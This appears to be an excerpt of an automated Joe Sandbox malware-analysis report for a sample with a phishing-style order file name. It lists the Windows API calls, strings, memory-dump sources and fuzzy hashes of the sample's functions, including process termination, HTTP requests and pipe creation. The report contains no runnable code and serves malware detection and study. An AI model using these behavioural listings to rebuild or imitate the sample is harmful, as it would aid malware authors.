Opcode Fuzzy Hash: 8364328d02ac5925869c5288c0cd67a6a41bd0c3f79fc2a0b1e62c94dca51390
Instruction Fuzzy Hash: BF018632642211ABEB152B54EC48DEF7779FF88711B04097EF503A21D0DB689C00EB58

Function 00447BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00447C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00447C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00447C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00447C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00447C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00447C4C

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 5b79f91bb502725146a981fb66a016f92bc9497a9dab4b53fcde00210b90123e
Instruction ID: 35bf4f29df7024d855b68b72e8dbd477f97e9b3f99e0063559bf8e03715a9039
Opcode Fuzzy Hash: 5b79f91bb502725146a981fb66a016f92bc9497a9dab4b53fcde00210b90123e
Instruction Fuzzy Hash: FEF03072542158BBE72157529C0DEEF7B7CDFC6B21F00042DFA01E1091E7A05A41C7B9

Function 00449A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00449A33
EnterCriticalSection.KERNEL32(?,?,?,?,00475DEE,?,?,?,?,?,0040ED63), ref: 00449A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00475DEE,?,?,?,?,?,0040ED63), ref: 00449A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00475DEE,?,?,?,?,?,0040ED63), ref: 00449A5E

Part of subcall function 004493D1: CloseHandle.KERNEL32(?,?,00449A6B,?,?,?,00475DEE,?,?,?,?,?,0040ED63), ref: 004493DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00449A71
LeaveCriticalSection.KERNEL32(?,?,?,?,00475DEE,?,?,?,?,?,0040ED63), ref: 00449A78

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 3f1e2c16216cecfdc73fce6ec1ef72f8582dbe07236a28daf3e2f1c983d17147
Instruction ID: 367759adab514061abb5dd86f6197ede6e78dda49913933573e170d0f774be30
Opcode Fuzzy Hash: 3f1e2c16216cecfdc73fce6ec1ef72f8582dbe07236a28daf3e2f1c983d17147
Instruction Fuzzy Hash: 0AF05432942211ABE7512B94EC4DDAF7739FF85311F14087AF503A10E0DB759C01DB54

Function 00401CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0041F4EA: std::exception::exception.LIBCMT ref: 0041F51E
Part of subcall function 0041F4EA: __CxxThrowException@8.LIBCMT ref: 0041F533

__swprintf.LIBCMT ref: 00401EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00401D49

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 82b08c520612b8ab66ce3cd8f7d53ce300e52d5fa051bcf5f61124a63d2ca7e1
Instruction ID: 0cb507bf716021c280e44969461f5a3ac9c79fa0f2d4483edf5a8f66c4972dd5
Opcode Fuzzy Hash: 82b08c520612b8ab66ce3cd8f7d53ce300e52d5fa051bcf5f61124a63d2ca7e1
Instruction Fuzzy Hash: FD918B71104211AFC724EF25C895CAFB7A4AF85704F00492FF986A72E1DB79ED05CB9A

Function 0045AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 201COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045B006
CharUpperBuffW.USER32(?,?), ref: 0045B115
VariantClear.OLEAUT32(?), ref: 0045B298

Part of subcall function 00449DC5: VariantInit.OLEAUT32(00000000), ref: 00449E05
Part of subcall function 00449DC5: VariantCopy.OLEAUT32(?,?), ref: 00449E0E
Part of subcall function 00449DC5: VariantClear.OLEAUT32(?), ref: 00449E1A

Strings

Incorrect Parameter format, xrefs: 0045B03E, 0045B20B
AUTOIT.ERROR, xrefs: 0045B11B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 56713130e16eb59f9dbee32f4d357027f59cd47faa250b292598f1fdbbd508dd
Instruction ID: 1f9de498f3950f4767e375b3967cc4dd59ce1ca00743eb2576c3b21184da22d5
Opcode Fuzzy Hash: 56713130e16eb59f9dbee32f4d357027f59cd47faa250b292598f1fdbbd508dd
Instruction Fuzzy Hash: 3F716B306043019FCB10DF25C48595BB7E4EF89705F04886EF89A9B3A2DB39ED49CB96

Function 00445347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717

_memset.LIBCMT ref: 00445438
GetMenuItemInfoW.USER32(?), ref: 00445467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00445513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0044553D

Strings

0, xrefs: 00445430

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 01a4ac22a369a3906532e4200640e2ca89e3b4e89d932765b1a56aece9e2e941
Instruction ID: 229c3148a9e1a9bfe78ef1b1e5e27531e8706f457ea565323bfac3cc7c02ae31
Opcode Fuzzy Hash: 01a4ac22a369a3906532e4200640e2ca89e3b4e89d932765b1a56aece9e2e941
Instruction Fuzzy Hash: 3B51E071604701ABEB159F28C841B7BB7E8AB86354F04062FF895D72D3DB78CD448B5A

Function 00440213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0044027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004402B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004402C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00440344

Strings

DllGetClassObject, xrefs: 004402B7

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 79973dfe286d0924063502fe85dda568f87302bef2bff90864adea8305253e84
Instruction ID: c3b2b385fa8966dad99c77db0206707ef9e6cc297604f621ef3166624dd72a76
Opcode Fuzzy Hash: 79973dfe286d0924063502fe85dda568f87302bef2bff90864adea8305253e84
Instruction Fuzzy Hash: 3B418F71600204EFEB05DF54C885B9E7BB9EF44314B1480AEEE099F246D7B8DD50CBA4

Function 00445007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00445075
GetMenuItemInfoW.USER32 ref: 00445091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 004450D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C1708,00000000), ref: 00445120

Strings

0, xrefs: 0044506D

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: d5a45825af7f55f2a7d769438b1b400d94e08b700d4cff6d26567d240da928d4
Instruction ID: db465f5d1fa94ec0c75b63f3553bf801786c42f1ac7b6e4bf5c0d2fbc051ce62
Opcode Fuzzy Hash: d5a45825af7f55f2a7d769438b1b400d94e08b700d4cff6d26567d240da928d4
Instruction Fuzzy Hash: 4441B1306057419FEB10DF25D885B2BB7E4AF89728F044A2FF85597392D734E800CB6A

Function 00460567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00460587

Strings

cdecl, xrefs: 004605DE
winapi, xrefs: 004605F8
stdcall, xrefs: 00460609
none, xrefs: 00460662

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 0e8fa9936e095e8789758d952d184e543a0e17c637bb92c0b3d6b3c3c7492529
Instruction ID: 5a99cc48baeaf98d2ac020c3fe827800d2685473d087967778722ea71df5eec6
Opcode Fuzzy Hash: 0e8fa9936e095e8789758d952d184e543a0e17c637bb92c0b3d6b3c3c7492529
Instruction Fuzzy Hash: 7B31A370500116ABCF00EF55CD419EFB3B4FF54318B10862FE826A76D2EB79A956CB98

Function 0043B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0043B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0043B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0043B8D1

Strings

ListBox, xrefs: 0043B84D
ComboBox, xrefs: 0043B815

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: fd2139567f8ab69302ba266fc19b701d19db26e173ca46828c3e37d05b5dba4b
Instruction ID: 75af9ec50760755e836abce323f7a54ddbaf44f5e0835d8c920f5867198b60a7
Opcode Fuzzy Hash: fd2139567f8ab69302ba266fc19b701d19db26e173ca46828c3e37d05b5dba4b
Instruction Fuzzy Hash: CD21D271A00108BEDB08AB65D886EFF7778DF49354F10422EF511A21E1DB7C590A97A8

Function 004543E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00454401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00454427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00454457
InternetCloseHandle.WININET(00000000), ref: 0045449E

Part of subcall function 00455052: GetLastError.KERNEL32(?,?,004543CC,00000000,00000000,00000001), ref: 00455067

Strings

, xrefs: 00454450

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 2ae2f1a1a1f5d3ddde5fac4bd687caf801070e50ddb0d6f6e3599f60f704cce5
Instruction ID: 7aa06a6f42cffd20407d20dfa3cc54c699f161c4d28ccd99cc58e54c7684c86d
Opcode Fuzzy Hash: 2ae2f1a1a1f5d3ddde5fac4bd687caf801070e50ddb0d6f6e3599f60f704cce5
Instruction Fuzzy Hash: 9C21D0B1540208BFE7119F94CC80EBF77ECEB8975DF10842FF9059A281EA688D499779

Function 004690E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0046915C
LoadLibraryW.KERNEL32(?), ref: 00469163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00469178
DestroyWindow.USER32(?), ref: 00469180

Strings

SysAnimate32, xrefs: 00469137

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: d7522572f52e7d85ebcabb9567955eca81081136ae215111d044ca7cb5f6ca0d
Instruction ID: 16967437a8ff6b7649d04cfe7d5b64226969d6153742429de35e53786cdd0d82
Opcode Fuzzy Hash: d7522572f52e7d85ebcabb9567955eca81081136ae215111d044ca7cb5f6ca0d
Instruction Fuzzy Hash: 7C218371600206BBFF104E649C44EFB37ADEF56364F20461AF95492290E7B5DC42A769

Function 00449568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00449588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004495B9
GetStdHandle.KERNEL32(0000000C), ref: 004495CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00449605

Strings

nul, xrefs: 00449600

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 1940121c75fedefb23b30f275eb602f4dfb1250f04432a587cdad5aad61bf5be
Instruction ID: 66b3d4fb4e9643f34041b919343489f51d7d56158e1018fa912c4bcc0f6ac78b
Opcode Fuzzy Hash: 1940121c75fedefb23b30f275eb602f4dfb1250f04432a587cdad5aad61bf5be
Instruction Fuzzy Hash: 48216B71600205ABFB219F25DC05A9FBBB8AF45724F204A2EF8A1D72D0D774DD41EB28

Function 00449634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00449653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00449683
GetStdHandle.KERNEL32(000000F6), ref: 00449694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004496CE

Strings

nul, xrefs: 004496C9

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 9c66512d6f95fcdfbabbbcbe61e1abb9c78875304d1df792b0257b063aef83bf
Instruction ID: 90b4d87eb029effa5109f35d439d52d9dc698f60e9680a3d94063f085d7b045b
Opcode Fuzzy Hash: 9c66512d6f95fcdfbabbbcbe61e1abb9c78875304d1df792b0257b063aef83bf
Instruction Fuzzy Hash: 7721A1719002059BEB209F698C44E9FB7E8AF95734F200A1AF8A1D33D0D7749C41DB18

Function 0044DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0044DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0044DB5E
__swprintf.LIBCMT ref: 0044DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0049DC00), ref: 0044DBB5

Strings

%lu, xrefs: 0044DB71

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 0e863479b16c5b18aead1394aa46db6b99ed56ed4ab462866a7c6e8f1ba0d1fc
Instruction ID: 3f2c14f763be1bc9491f9a3c94b39e6a6fdc32e8a328795c95cef823b322e4a2
Opcode Fuzzy Hash: 0e863479b16c5b18aead1394aa46db6b99ed56ed4ab462866a7c6e8f1ba0d1fc
Instruction Fuzzy Hash: 5C218635A00108EFDB10EF65D985D9EBBB8EF89704B10407EF505E7291DB74EA41CB65

Function 0043C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0043C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0043C84A
Part of subcall function 0043C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043C85D
Part of subcall function 0043C82D: GetCurrentThreadId.KERNEL32 ref: 0043C864
Part of subcall function 0043C82D: AttachThreadInput.USER32(00000000), ref: 0043C86B

GetFocus.USER32 ref: 0043CA05

Part of subcall function 0043C876: GetParent.USER32(?), ref: 0043C884

GetClassNameW.USER32(?,?,00000100), ref: 0043CA4E
EnumChildWindows.USER32(?,0043CAC4), ref: 0043CA76
__swprintf.LIBCMT ref: 0043CA90

Strings

%s%d, xrefs: 0043CA8A

Memory Dump Source

